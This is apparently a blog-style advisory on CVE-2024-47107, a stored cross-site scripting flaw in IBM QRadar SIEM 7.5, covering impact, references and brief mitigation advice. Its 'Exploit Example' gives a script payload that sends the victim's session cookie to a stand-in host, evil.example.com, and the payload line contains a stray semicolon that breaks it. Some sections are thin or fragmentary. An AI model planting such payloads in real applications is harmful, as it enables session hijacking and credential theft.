CVE-2024-47107 - IBM QRadar SIEM 7.5 Vulnerability Exposes Users to Stored XSS Attacks

In May 2024, a significant security flaw was discovered in IBM QRadar SIEM version 7.5. This bug, logged as CVE-2024-47107, allows authenticated users to inject and store malicious JavaScript code within the web interface. If exploited, this stored cross-site scripting (XSS) issue could let an attacker alter system behavior, steal user credentials, and even take over user sessions—all from within a trusted environment.

This article dives deep into how this vulnerability works, how to exploit it, and how to prevent it. It also includes code snippets and references, keeping everything clear and in straightforward language.

What Is Stored XSS and Why Does It Matter?

Stored XSS (cross-site scripting) occurs when an application accepts and stores user input (like names, descriptions, or comments) and then displays it to others *without* properly cleaning it up. If the app doesn't check for scripts, an attacker can save a JavaScript payload and that code will run in other people's browsers when they view the affected page.

How CVE-2024-47107 Works

If a logged-in user enters JavaScript payloads into certain input fields, QRadar SIEM fails to sanitize the input before displaying it. When another (or even the same) user views the input on the Web UI, the JavaScript executes in their browser context. This could allow an attacker to:

Perform unauthorized actions on behalf of the target.

Vulnerable Component:
IBM QRadar SIEM version 7.5 Web UI

Impacted Users:
Any authenticated user with access to input fields and pages reflecting user-controlled data.

Exploit Example

Suppose there’s a “description” field for a log source or asset in the SIEM interface. An attacker could enter:

<script>
  fetch('https://evil.example.com/steal?cookie='; + document.cookie);
</script>

If this input is later rendered in the admin’s browser, the script will silently send the target’s session cookie to the attacker's server.

Reference

- IBM Security Bulletin: IBM QRadar SIEM Vulnerabilities (CVE-2024-47107)
- NIST NVD CVE Detail: CVE-2024-47107
- QRadar Product Page: IBM QRadar SIEM

Sanitize Input:

If you customize any part of the interface, use HTML and JavaScript sanitizing libraries to filter user input.

Conclusion

The CVE-2024-47107 stored XSS vulnerability in IBM QRadar SIEM 7.5 is a serious threat because it can silently allow attackers to hijack sessions or steal credentials. The attack exploits weaknesses in the way user input is stored and reflected, highlighting the need for strict input validation and fast patch management.

Security teams should treat this flaw as a priority, apply updates, and review permissions within their SIEM systems.

Timeline

Published on: 12/07/2024 15:15:04 UTC